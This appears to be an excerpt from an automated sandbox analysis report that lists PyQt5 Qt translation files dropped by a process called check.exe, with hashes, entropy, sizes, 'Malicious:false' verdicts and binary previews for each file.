                                                                                                                                                                                                                                      SHA-512:24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_uk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9750
                                                                                                                                                                                                                                      Entropy (8bit):5.281035122342072
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
                                                                                                                                                                                                                                      MD5:90A776917D534B65942063C319573CDC
                                                                                                                                                                                                                                      SHA1:5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
                                                                                                                                                                                                                                      SHA-256:497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
                                                                                                                                                                                                                                      SHA-512:B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_zh_CN.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6441
                                                                                                                                                                                                                                      Entropy (8bit):5.790303416386852
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
                                                                                                                                                                                                                                      MD5:9297A6905B8B1823BF7E318D9138A104
                                                                                                                                                                                                                                      SHA1:3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
                                                                                                                                                                                                                                      SHA-256:C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
                                                                                                                                                                                                                                      SHA-512:01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_zh_TW.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9301
                                                                                                                                                                                                                                      Entropy (8bit):5.80411750798786
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
                                                                                                                                                                                                                                      MD5:47C3328D3918CF627112BB6C50E30B86
                                                                                                                                                                                                                                      SHA1:05705603AB3F28402A6C103E1C41DDFF21D140C0
                                                                                                                                                                                                                                      SHA-256:3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
                                                                                                                                                                                                                                      SHA-512:8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_hu.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
                                                                                                                                                                                                                                      MD5:5A46979B45C67DD6312F33CCEA2ED7BC
                                                                                                                                                                                                                                      SHA1:4C56836B1FB10D9903B299CBCB925947D515B4C8
                                                                                                                                                                                                                                      SHA-256:BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
                                                                                                                                                                                                                                      SHA-512:BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_it.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
                                                                                                                                                                                                                                      MD5:2BB8C94D420D3BC344C79A01043BDC89
                                                                                                                                                                                                                                      SHA1:3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
                                                                                                                                                                                                                                      SHA-256:9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
                                                                                                                                                                                                                                      SHA-512:C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_ja.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.599979504080125
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
                                                                                                                                                                                                                                      MD5:8A1EE3433304838CCD0EBE0A825E84D8
                                                                                                                                                                                                                                      SHA1:2B3476588350C5384E0F9A51FF2E3659E89B4846
                                                                                                                                                                                                                                      SHA-256:23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
                                                                                                                                                                                                                                      SHA-512:2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_ko.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.652277257665055
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                                                      MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                                                      SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                                                      SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
                                                                                                                                                                                                                                      SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_lt.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165383
                                                                                                                                                                                                                                      Entropy (8bit):4.805977227348512
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
                                                                                                                                                                                                                                      MD5:8992B652D1499F5D2F12674F3F875A35
                                                                                                                                                                                                                                      SHA1:E22766A49612F79156C550D83C6C230345DDA433
                                                                                                                                                                                                                                      SHA-256:47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
                                                                                                                                                                                                                                      SHA-512:9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ltB..0X...*..)C...+...|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E..*....................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_lv.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):89
                                                                                                                                                                                                                                      Entropy (8bit):4.156834975253888
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
                                                                                                                                                                                                                                      MD5:19F1B919BB531E9E12E7F707BEBD8497
                                                                                                                                                                                                                                      SHA1:46E82683CEA28D877C73A5CE02F965BB1130FC62
                                                                                                                                                                                                                                      SHA-256:03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
                                                                                                                                                                                                                                      SHA-512:901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_pl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):161
                                                                                                                                                                                                                                      Entropy (8bit):3.8693516202048612
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
                                                                                                                                                                                                                                      MD5:D71EA9FEFD97464B178235150EC8759E
                                                                                                                                                                                                                                      SHA1:61026FE602FD1B8B442A0D341C6BD759EEC75488
                                                                                                                                                                                                                                      SHA-256:BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
                                                                                                                                                                                                                                      SHA-512:ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_pt.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70334
                                                                                                                                                                                                                                      Entropy (8bit):4.732724622610353
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
                                                                                                                                                                                                                                      MD5:6656500F7A28EF820AE9F97FD47FB5BB
                                                                                                                                                                                                                                      SHA1:CC112B9C9513BCF7497F3417168B4C8A9F7640A9
                                                                                                                                                                                                                                      SHA-256:2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
                                                                                                                                                                                                                                      SHA-512:5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......pt_PTB...(...*...9...+...e...]..6....;.......;..-....;..;`...;..};...;.......M..6....O... ...O...w...........}..7....m..7B..........+;......+;..8S..+;..>...+O......+O..8#..H4......H.......J......K.......LD...)..L....}..PS...l..Zr...B..[`...;..[`.....\...kU.._......._.......1...?...............8...............E............,..................p........0...............v...........%...O...%..G........4...0.......0..:....0..y....0..|....0.......0...X...5.......5...... D..=... D..Kn..+....L..,...>...,......<U..z...<U......<.......F...>...F.......H5...4..H5..=...H5..K...H5......f....p..f...1...f...;...f...I...f...|H..f.......f.......l....................b......<...............>.......L ...........`......`..._.......A......2....e...g...e..>D...e..LW................y...,.*.y.....*.y..o..*.y.....*.T..L..*.0..'..*.0....+F...y..+F......+f......+f...C..+.z..0..+.....d.+....p0.+.....R.+.z..0U.+.....u.+....8..+....Ct.+....L..+....y..+.....Z.+......+...pc.+.....+....0..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_ru.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                                                                      Entropy (8bit):3.984562388316898
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
                                                                                                                                                                                                                                      MD5:F7A8C75408B9A34A2B185E76F51B7B85
                                                                                                                                                                                                                                      SHA1:065E987139C5FB809A6F9CDF3845BCD79707FDBB
                                                                                                                                                                                                                                      SHA-256:6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
                                                                                                                                                                                                                                      SHA-512:E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_sk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157
                                                                                                                                                                                                                                      Entropy (8bit):3.7731953311404336
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
                                                                                                                                                                                                                                      MD5:24C179481B5EF574F33E983A62A34D53
                                                                                                                                                                                                                                      SHA1:0A67F1ED8CA4A5182F504806F8D47D499789F2D2
                                                                                                                                                                                                                                      SHA-256:B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
                                                                                                                                                                                                                                      SHA-512:4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......sk....v.....q.t.b.a.s.e._.s.k.....q.t.s.c.r.i.p.t._.s.k.....q.t.m.u.l.t.i.m.e.d.i.a._.s.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.s.k...........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_sl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):228428
                                                                                                                                                                                                                                      Entropy (8bit):4.726953418955661
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
                                                                                                                                                                                                                                      MD5:D35A0FE35476BE8BD149CEE46E42B5E9
                                                                                                                                                                                                                                      SHA1:9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
                                                                                                                                                                                                                                      SHA-256:C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
                                                                                                                                                                                                                                      SHA-512:BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......slB..<....*.......+.......@...C...A.......B...<...C.......D...2...E.......F...d...G.......H...W...I.......P.......Q.......R.......S...x...T.......U...n...V...%...W.......X.......Y.......]..g~...t...V.......f..................................;..G....;..[....;...q...;..ia...;... ...M..g....O.......O.......[..,e...........}..g....m..h........Q..(5......+;..2...+;...b..+;...i..+O..2...+O...4..1......E@......F.......H4......HY...%..H.......I.......I@......IA...9..IC......J...6...J.......J.......J...^...K...7...LD......L....n..PS...U..R.......T....=..Zr......[`...V..[`......\...!,..\...8U.._..."b.._.../h..1.......E...9......4...............5........e...................$...<...$..Z....[.......,.......y...L...y..].......H.......@.......J.......6........~..........E...O...E..+....E...~..............,1...%..8r...%...........^..............................5.......0..Gx...0.......0..P....0..h....0.......0.......5...^.......... D...... D......+....`..,.......,...-...<U

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_sv.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65851
                                                                                                                                                                                                                                      Entropy (8bit):4.7906769989650515
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
                                                                                                                                                                                                                                      MD5:0E85E0E0E7DDFE3D4BDE302F27047F9C
                                                                                                                                                                                                                                      SHA1:AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
                                                                                                                                                                                                                                      SHA-256:4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
                                                                                                                                                                                                                                      SHA-512:8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
